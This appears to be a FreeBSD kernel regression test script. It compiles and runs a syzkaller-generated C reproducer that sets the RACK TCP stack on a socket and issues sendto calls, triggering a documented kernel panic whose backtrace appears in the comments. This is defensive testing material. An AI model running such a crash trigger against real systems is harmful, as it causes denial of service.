#!/bin/sh # panic: sbsndptr_noadv: sb_mb is NULL # cpuid = 0 # time = 1586867804 # KDB: stack backtrace: # db_trace_self_wrapper() at db_trace_self_wrapper+0x47/frame 0xfffffe0025a68360 # vpanic() at vpanic+0x1c7/frame 0xfffffe0025a683c0 # panic() at panic+0x43/frame 0xfffffe0025a68420 # sbsndptr_noadv() at sbsndptr_noadv+0xae/frame 0xfffffe0025a68460 # rack_output() at rack_output+0x51f5/frame 0xfffffe0025a68700 # tcp_usr_send() at tcp_usr_send+0x5c7/frame 0xfffffe0025a687e0 # sosend_generic() at sosend_generic+0x8fd/frame 0xfffffe0025a688e0 # sosend() at sosend+0xc6/frame 0xfffffe0025a68950 # kern_sendit() at kern_sendit+0x33d/frame 0xfffffe0025a68a00 # sendit() at sendit+0x224/frame 0xfffffe0025a68a60 # sys_sendto() at sys_sendto+0x5c/frame 0xfffffe0025a68ac0 # amd64_syscall() at amd64_syscall+0x262/frame 0xfffffe0025a68bf0 [ `uname -p` = "i386" ] && exit 0 . ../default.cfg cat > /tmp/syzkaller10.c < #include #include #include #include #include #include #include #include #include uint64_t r[1] = {0xffffffffffffffff}; int main(void) { syscall(SYS_mmap, 0x20000000ul, 0x1000000ul, 3ul, 0x1012ul, -1, 0ul); intptr_t res = 0; res = syscall(SYS_socket, 2ul, 1ul, 0); if (res != -1) r[0] = res; memcpy((void*)0x20000080, "rack\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000" "\000\000\000\000\000\000\000\000\000\000\000\000", 32); *(uint32_t*)0x200000a0 = 0; syscall(SYS_setsockopt, r[0], 6, 0x2000, 0x20000080ul, 0x24ul); *(uint8_t*)0x20000000 = 0x2c; *(uint8_t*)0x20000001 = 2; *(uint16_t*)0x20000002 = htobe16(0x4e21); *(uint32_t*)0x20000004 = htobe32(-1); *(uint8_t*)0x20000008 = 0; *(uint8_t*)0x20000009 = 0; *(uint8_t*)0x2000000a = 0; *(uint8_t*)0x2000000b = 0; *(uint8_t*)0x2000000c = 0; *(uint8_t*)0x2000000d = 0; *(uint8_t*)0x2000000e = 0; *(uint8_t*)0x2000000f = 0; syscall(SYS_sendto, r[0], 0ul, 0ul, 0ul, 0x20000000ul, 0x10ul); *(uint8_t*)0x20000040 = 0x10; *(uint8_t*)0x20000041 = 2; *(uint16_t*)0x20000042 = htobe16(0x4e21); *(uint32_t*)0x20000044 = htobe32(0); *(uint8_t*)0x20000048 = 0; *(uint8_t*)0x20000049 = 0; *(uint8_t*)0x2000004a = 0; *(uint8_t*)0x2000004b = 0; *(uint8_t*)0x2000004c = 0; *(uint8_t*)0x2000004d = 0; *(uint8_t*)0x2000004e = 0; *(uint8_t*)0x2000004f = 0; syscall(SYS_sendto, r[0], 0ul, 0ul, 0x60005ul, 0x20000040ul, 0x10ul); return 0; } EOF mycc -o /tmp/syzkaller10 -Wall -Wextra -O2 /tmp/syzkaller10.c -lpthread || exit 1 (cd /tmp; ./syzkaller10) & sleep 60 pkill -9 syzkaller10 wait rm -f /tmp/syzkaller10 /tmp/syzkaller10.c /tmp/syzkaller10.core exit 0